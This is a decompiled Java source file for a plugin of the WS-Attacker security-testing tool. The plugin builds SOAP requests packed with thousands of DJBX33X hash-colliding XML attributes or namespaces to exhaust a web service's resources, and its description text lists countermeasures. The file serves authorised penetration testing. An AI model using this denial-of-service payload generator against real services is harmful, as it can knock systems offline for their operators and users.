/*
 * Decompiled with CFR 0.152.
 */
package wsattacker.plugin.dos;

import java.util.HashMap;
import java.util.Map;
import wsattacker.main.composition.plugin.option.AbstractOption;
import wsattacker.main.composition.plugin.option.AbstractOptionInteger;
import wsattacker.main.plugin.option.OptionLimitedInteger;
import wsattacker.main.plugin.option.OptionSimpleBoolean;
import wsattacker.plugin.dos.dosExtension.abstractPlugin.AbstractDosPlugin;
import wsattacker.plugin.dos.dosExtension.attackClasses.hashDos.CollisionDJBX33X;
import wsattacker.plugin.dos.dosExtension.option.OptionTextAreaSoapMessage;
import wsattacker.plugin.dos.dosExtension.util.UtilHashDoS;

public class HashCollisionDJBX33X
extends AbstractDosPlugin {
    private static final long serialVersionUID = 1L;
    private AbstractOptionInteger optionNumberAttributes;
    private OptionSimpleBoolean optionUseNamespaces;

    @Override
    public void initializeDosPlugin() {
        this.initData();
        this.optionNumberAttributes = new OptionLimitedInteger("Number of colliding attributes", 10000, "The number of colliding attributes placed within the message", 0, 99999999);
        this.optionUseNamespaces = new OptionSimpleBoolean("Use namespaces?", false, "checked = collisions in namespaces, unchecked = collisions in attributes");
        this.getPluginOptions().add((AbstractOption)this.optionNumberAttributes);
        this.getPluginOptions().add((AbstractOption)this.optionUseNamespaces);
    }

    public AbstractOptionInteger getOptionNumberAttributes() {
        return this.optionNumberAttributes;
    }

    @Override
    public OptionTextAreaSoapMessage.PayloadPosition getPayloadPosition() {
        return OptionTextAreaSoapMessage.PayloadPosition.HEADERLASTCHILDELEMENTATTRIBUTES;
    }

    public void initData() {
        this.setName("DJBX33X Hash Collision Attack");
        this.setDescription("<html><p>This attack checks wheter or not a Web service is vulnerable to a Hash Collision Attack for a DJBX33X hash algorithm.</p><p>The attack exhausts the resources of the server by constantly creating collisions in the hash map algorithm that is used to process the XML document. </p><p>See the original advisory: <a href=\"http://www.nruns.com/_downloads/advisory28122011.pdf\">http://www.nruns.com/_downloads/advisory28122011.pdf</p><p>The attack algorithm replaces the string $$PAYLOADATTR$$ in the SOAP message below with the defined number of colliding attributes or XML namespaces.The placeholder $$PAYLOADATTR$$ can be set to any other position in the SOAP message.</p></html>");
        this.setCountermeasures("In order to fix the root of the problem the implementation of the hash mapping algorithm has to be made cryptographically stronger.\nHowever this is usually beyond the scope of the tester.It is recommended to check if a fix for the current version of the underlying programming language is available.If a fix is provided, update to the latest version to fix the issue.If no fix is provided, limit the number of attributes that an XML element can hold.");
    }

    @Override
    public void createTamperedRequest() {
        StringBuilder sb = new StringBuilder("");
        CollisionDJBX33X DJBX33X = new CollisionDJBX33X();
        DJBX33X.genNCollisions(this.optionNumberAttributes.getValue(), sb, this.optionUseNamespaces.isOn());
        String soapMessage = this.getOptionTextAreaSoapMessage().getValue();
        String soapMessageFinal = this.getOptionTextAreaSoapMessage().replacePlaceholderWithPayload(soapMessage, sb.toString());
        HashMap<String, String> httpHeaderMap = new HashMap<String, String>();
        for (Map.Entry<String, String> entry : this.getOriginalRequestHeaderFields().entrySet()) {
            httpHeaderMap.put(entry.getKey(), entry.getValue());
        }
        this.setTamperedRequestObject(httpHeaderMap, this.getOriginalRequest().getEndpoint(), soapMessageFinal);
    }

    @Override
    public void createUntamperedRequest() {
        CollisionDJBX33X DJBX33X = new CollisionDJBX33X();
        String untampered = UtilHashDoS.generateUntampered(DJBX33X, this.optionNumberAttributes.getValue(), this.optionUseNamespaces.isOn());
        String soapMessage = this.getOptionTextAreaSoapMessage().getValue();
        String soapMessageFinal = this.getOptionTextAreaSoapMessage().replacePlaceholderWithPayload(soapMessage, untampered);
        HashMap<String, String> httpHeaderMap = new HashMap<String, String>();
        for (Map.Entry<String, String> entry : this.getOriginalRequestHeaderFields().entrySet()) {
            httpHeaderMap.put(entry.getKey(), entry.getValue());
        }
        this.setUntamperedRequestObject(httpHeaderMap, this.getOriginalRequest().getEndpoint(), soapMessageFinal);
    }
}

